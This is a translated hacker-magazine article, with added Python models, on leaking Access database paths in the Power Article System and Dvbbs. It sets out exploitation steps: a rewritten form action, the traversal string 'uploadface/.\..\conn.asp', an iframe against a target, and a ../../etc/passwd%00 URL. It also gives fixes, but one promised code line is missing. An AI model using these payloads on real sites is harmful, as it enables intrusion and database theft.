From: www.4ngel.net
E-mail: sniper@77169.com
This article has been published in "Hacker X Files" (黑客X档案).
######################################

Preface

As the core of a website, the importance of the database goes without saying, and administrators go to great lengths to rename the database file and put special characters in its name to make it harder to find. Recently, however, the database paths of several well-secured sites have been discovered and the databases downloaded, using the technique now widely discussed as "暴库" (database exposure, rendered "Storm Database" in some translations): getting the site itself to reveal its database path. I have studied this technique together with friends at zihuan and Hacker X Files. Although we do not have many results yet, I hope this can serve as a starting point for others to build on. Below I take two systems as examples for analysis:
Power Article System (动力文章系统)

Generally, every web application has a file that connects to the database (usually conn.asp). Its name and location are not fixed: some sites keep it in the site root, others in a dedicated folder, most often a folder named inc containing conn.asp. When people think of this file in connection with exposing the database, they usually think of requesting it directly to obtain the database information. In fact, requesting the file directly does not give us what we want, so it has to be combined with some other vulnerability to expose the database.

First, a brief introduction to the program. The Power Article System comes in a commercial SQL Server edition and a free Access edition; the Access edition is tested here. The program's conn.asp, which connects to the database, lives in the /inc directory, while the database file lives in the /database directory, and the database is opened through a relative path:

db = "database/adsfkldfogowerjnokfdslwejhdfsjhk.mdb"

The database path disclosure in the Power Article System should be put down to programmer carelessness: because conn.asp carries this hidden weakness, an attacker can obtain the database path. Vulnerability discoverer: every day (the girl from the Hacker X Files forum known as Sohu). Researchers involved: Strange Dog, iceyes, sniper. (For the vulnerability analysis see http://www.hackerxfiles.net/bbs/dispbbs.asp?boardid=4&id=27293.) At first we thought editor.asp lacked sufficient validation, but after analysis it turned out the problem was not with editor.asp at all; every day simply used editor.asp to view what the server returned. Let's walk through the attack. Open the page in IE and see what it can do (figure 1).

Figure 1

Clearly this file is used to edit the content of an article. Although it has no other permissions, we can edit and change the HTML of the page.
Click "original code" (the editor's source view) and you will find the following content:
<form name="login" onsubmit="return checkform();" action="admin_chklogin.asp" method="post" target="_parent"><table cellspacing="0" cellpadding="0" width="585" align="center" border="0">
This is the form on the page that posts the login data to admin_chklogin.asp for authentication. Next we change its action to point at conn.asp:
<form name="login" onsubmit="return checkform();" action="http://www.target.com/inc/conn.asp" method="post" target="_parent"><table cellspacing="0" cellpadding="0" width="585" align="center" border="0">
After making the change, click "preview". What do you see? The database path is displayed (figure 2)!

Figure 2

Why? Look at the message:
'D:\web\power\access\INC\database\adsfkldfogowerjnokfdslwejhdfsjhk.mdb' is not a valid path. Make sure that the path name is spelled correctly and that you are connected to the server on which the file resides.
I described the directory structure above: the inc directory (holding conn.asp) and the database directory (holding the database file adsfkldfogowerjnokfdslwejhdfsjhk.mdb) both sit in the main directory. Because database is not under inc, the path shown when the database was just exposed is /INC/database/. This is an oversight by the developers. inc and database are siblings in the same directory, so when editor.asp is used to reach conn.asp directly, the relative path is resolved against the inc directory; the database is not under inc, so the system believes we are asking for /INC/database/adsfkldfogowerjnokfdslwejhdfsjhk.mdb, a file that does not exist. Unable to find the file, it reports an error, and the error contains the full path. The most direct fix is to put conn.asp in the directory above the database file, or in the same directory as the pages that call it, as Dvbbs does.

Dvbbs (动网论坛)

From the analysis of the Power Article System above, we can characterize a program with a database path disclosure problem:
1. conn.asp is not in the same directory as the file that calls it (such as index.asp).
2. conn.asp uses a relative path to connect to the database.

Knowing the principle of the vulnerability, it is not hard to see how to get the Dvbbs database. Some time ago a serious vulnerability was found in Dvbbs that lets anyone move arbitrary files: by exploiting it, you can delete other people's forum files without any permissions. When I discussed this with zihuan that day, it occurred to me that combining this vulnerability with the method used to get the Power Article System's database gives an easy way to get the Dvbbs database too. Let's see what to do with Dvbbs. The Dvbbs vulnerability is in mymodify.asp, which handles the user-defined avatar too hastily; we can use a backslash traversal (.\..\) to jump out of the directory and move a file. See the following code:
'******************
'Filter and rename the uploaded avatar image
If CInt(forum_setting(7)) = 1 Then
    On Error Resume Next
    Dim objfso, upfilename, newfilename
    Dim upface, memberid
    Set rs = conn.execute("select userid, face from [user] where userid=" & userid)
    memberid = rs(0)
    upface = Trim(rs(1))
    newfilename = ""
    upfilename = Split(upface, "/")
    If UBound(upfilename) = 1 And upfilename(0) = "uploadface" Then
        If InStr(upfilename(1), "_") = 0 Then
            ' rename the avatar to uploadface/<user id>_<original name>
            newfilename = "uploadface/" & memberid & "_" & upfilename(1)
            Set objfso = Server.CreateObject("Scripting.FileSystemObject")
            If objfso.FileExists(Server.MapPath(upface)) Then
                objfso.MoveFile "" & Server.MapPath(upface) & "", "" & Server.MapPath(newfilename) & ""
            End If
            If Err.Number = 0 Then
                conn.execute("update [user] set face='" & newfilename & "' where userid=" & userid)
            End If
            Set objfso = Nothing
        End If
    End If
    rs.Close
    Set rs = Nothing
End If
'Filter and rename the uploaded avatar image
'****************
Look at this line:

newfilename = "uploadface/" & memberid & "_" & upfilename(1)   ' the avatar becomes uploadface/<user id>_<the rest of upfilename>

and then at these:

If objfso.FileExists(Server.MapPath(upface)) Then
    objfso.MoveFile "" & Server.MapPath(upface) & "", "" & Server.MapPath(newfilename) & ""

See it? The crucial point is: if the file referred to by upface exists, move it and rename it!
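To make the filter concrete, here is an added Python model of the logic quoted above. It is not Dvbbs code and not code from the original article: it re-implements the Split-based check and the two Server.MapPath calls with ntpath, so one can test on any OS which avatar strings pass and where they would send the file, including the backslash-traversal string the article goes on to use. The physical directory of mymodify.asp (D:\web\dvbbs), the user id 123, the avatar names and the allow-list used by the hardened variant are all assumptions for the example.

```python
"""Added model of the avatar-rename logic quoted above from Dvbbs mymodify.asp.
It is not Dvbbs code and not from the original article: it re-implements the
Split-based check and the two Server.MapPath calls with ntpath so that the effect
of a crafted avatar string can be tested on any OS.  The physical directory of
mymodify.asp, the user id and the avatar names used below are assumed.
"""
import ntpath
import re

FORUM_ROOT = r"D:\web\dvbbs"   # assumed physical directory of mymodify.asp


def map_path(relative: str) -> str:
    """Model of Server.MapPath(relative) as called from mymodify.asp: the string
    is joined to the script's directory and normalized lexically, as Win32 does,
    so a '..' removes the preceding component whether or not that directory exists."""
    return ntpath.normpath(ntpath.join(FORUM_ROOT, relative))


def vulnerable_rename(upface: str, memberid: int):
    """Mirror of the quoted VBScript.  Returns the (source, destination) physical
    paths the code would hand to objfso.MoveFile, or None if the filter rejects
    the avatar string."""
    parts = upface.split("/")                          # Split(upface, "/"): backslashes are not separators
    if len(parts) != 2 or parts[0] != "uploadface":    # UBound = 1 And (0) = "uploadface", case-sensitive
        return None
    if "_" in parts[1]:                                # InStr(upfilename(1), "_") = 0
        return None
    newfilename = f"uploadface/{memberid}_{parts[1]}"
    return map_path(upface), map_path(newfilename)


SAFE_NAME = re.compile(r"^[A-Za-z0-9]+\.(gif|jpg|png)$")   # assumed allow-list for the fix


def hardened_rename(upface: str, memberid: int):
    """The same operation with the checks a fix needs: the file name must match an
    allow-list (no dots, slashes or backslashes beyond the extension) and both
    normalized physical paths must stay inside the uploadface directory."""
    parts = upface.split("/")
    if len(parts) != 2 or parts[0] != "uploadface" or not SAFE_NAME.match(parts[1]):
        return None
    src = map_path(upface)
    dst = map_path(f"uploadface/{memberid}_{parts[1]}")
    face_dir = map_path("uploadface") + "\\"
    if not (src.startswith(face_dir) and dst.startswith(face_dir)):
        return None
    return src, dst


if __name__ == "__main__":
    for face in ("uploadface/me.gif", "uploadface/../conn.asp", r"uploadface/.\..\conn.asp"):
        print(repr(face), "->", vulnerable_rename(face, 123), "| hardened:", hardened_rename(face, 123))
```

"uploadface/../conn.asp" is rejected because Split on "/" yields three parts. "uploadface/.\..\conn.asp" passes every check: the source resolves to D:\web\dvbbs\conn.asp, and the destination "uploadface/123_.\..\conn.asp" resolves to D:\web\dvbbs\uploadface\conn.asp, because the nonexistent "123_." component is consumed by the ".." that follows it. The hardened variant rejects it at the allow-list and would also reject it at the containment check.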
Now the code analysis is done; let's see how to use it. Register a user and go to the basic-information modification page; here comes the key part. Remember how, when playing with showfiles, we jumped out of the directory to view information? Similar to the following URL, where ../ is used to climb out of the directory and read the passwd file:
http://www.target.com/show.php?file=../../etc/passwd%00
I believe everyone knows what /, \, .. and . mean. What we need to do is jump out of the directory and move conn.asp. Enter the following in the custom avatar address:
uploadface/.\..\conn.asp   (mind the case: the check compares against "uploadface" exactly)
Having analyzed the code above, the meaning of this string should be clear. We point the "avatar" address at the conn.asp in the parent directory. Split on "/" sees only two parts, "uploadface" and ".\..\conn.asp", because backslashes are not separators, so every check passes. Server.MapPath("uploadface/.\..\conn.asp") resolves to the forum's own conn.asp, while the destination "uploadface/<user id>_.\..\conn.asp" is normalized by Windows so that the "<user id>_." component is cancelled by the ".." after it, leaving uploadface\conn.asp. So conn.asp is moved into the uploadface directory, which satisfies the first condition from the Power Article System analysis. Domestic programs generally use relative paths, so we only need to request the moved file to learn the database path. Put the following in a new HTML file:
<iframe marginwidth="0" marginheight="0" src="http://www.target.com/dvbbs/uploadFace/conn.asp" frameborder="0" width="500" scrolling="no" height="400"></iframe>
Open the HTML file and see whether the database path is there (figure 3)!

Figure 3

Security

It seems the problem lies in conn.asp itself, so to be safe we have to deal with it. The crudest approach is to rename it so that nobody can guess the path, but it is called by many files and they would all need to be changed. When a relative path is used, the database path changes with whichever file calls conn.asp, and that is what produces the error. So we can use an absolute path to connect to the database; then no matter who calls conn.asp, the path stays the same. While testing the Dvbbs vulnerability I found that on some newer versions the database path could not be exposed even though the file was moved successfully, whereas some 6.0 versions are still affected. It seems the newer Dvbbs releases have given conn.asp special treatment. Comparing the two conn.asp files, the new one contains the following line:

With that line in place, the database information is not shown when an error occurs! Of course, combining it with the methods above is even better!
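To make the difference between the relative connection string and the root-relative fix concrete, here is an added Python model. It is not code from the Power Article System, from Dvbbs or from the original article. Classic ASP resolves a relative argument to Server.MapPath against the virtual directory of the page being executed, not against the file that contains the call, so the same conn.asp opens different physical paths depending on how it is reached. The site root D:\web\power\access, the file layout (conn.asp in /inc, the .mdb in /database, as the article describes) and the Jet error text are constructed for the example.

```python
"""Added model of why the relative connection string leaks the physical path,
and of the root-relative fix recommended in the Security section.  It is not
code from the Power Article System or from the original article.  Classic ASP
resolves a relative argument to Server.MapPath against the virtual directory of
the page being executed, not against the file that contains the call, so the
same conn.asp opens different physical paths depending on how it is reached.
The site root, the file layout and the Jet error text below are constructed for
the example (the layout follows the article: conn.asp in /inc, the .mdb in /database).
"""
import ntpath
import posixpath

SITE_ROOT = r"D:\web\power\access"   # assumed physical root of the site

# Assumed deployed files, stored as normalized physical paths.
EXISTING_FILES = {
    ntpath.normpath(ntpath.join(SITE_ROOT, v))
    for v in ("index.asp", r"inc\conn.asp", r"database\adsfkldfogowerjnokfdslwejhdfsjhk.mdb")
}

VULNERABLE_DB = "database/adsfkldfogowerjnokfdslwejhdfsjhk.mdb"    # relative, as in the article
HARDENED_DB = "/database/adsfkldfogowerjnokfdslwejhdfsjhk.mdb"     # root-relative: same file from anywhere


def map_path(requested_page: str, path: str) -> str:
    """Model of Server.MapPath: '/x' is resolved from the site root, anything else
    from the virtual directory of the page currently executing."""
    if path.startswith("/"):
        virtual = posixpath.normpath(path)
    else:
        virtual = posixpath.normpath(posixpath.join(posixpath.dirname(requested_page), path))
    return ntpath.normpath(ntpath.join(SITE_ROOT, virtual.lstrip("/")))


def jet_open(physical: str) -> str:
    """Model of the Jet engine's response: success, or the verbose error that
    echoes the physical path the application tried to open."""
    if physical in EXISTING_FILES:
        return "opened " + physical
    return (f"'{physical}' is not a valid path. Make sure that the path name is "
            "spelled correctly and that you are connected to the server on which "
            "the file resides.")


def connect(requested_page: str, db: str) -> str:
    """What conn.asp's connection attempt yields when the given page is requested."""
    return jet_open(map_path(requested_page, db))


if __name__ == "__main__":
    for page in ("/index.asp", "/inc/conn.asp"):   # included from index.asp vs. requested directly
        print(page, "relative      ->", connect(page, VULNERABLE_DB))
        print(page, "root-relative ->", connect(page, HARDENED_DB))
```

Requested through /index.asp, which includes inc/conn.asp, the relative string opens D:\web\power\access\database\adsfkldfogowerjnokfdslwejhdfsjhk.mdb. Requested directly as /inc/conn.asp, which is what the editor.asp form trick achieves, it asks for D:\web\power\access\inc\database\adsfkldfogowerjnokfdslwejhdfsjhk.mdb, which does not exist, and the error hands the physical directory and the obfuscated file name to the attacker. With the root-relative string both requests map to the same file. Renaming the database file does not help against this disclosure, because the error prints whatever name conn.asp uses; keeping conn.asp in the callers' directory, as the article also suggests, removes the mismatch in the same way.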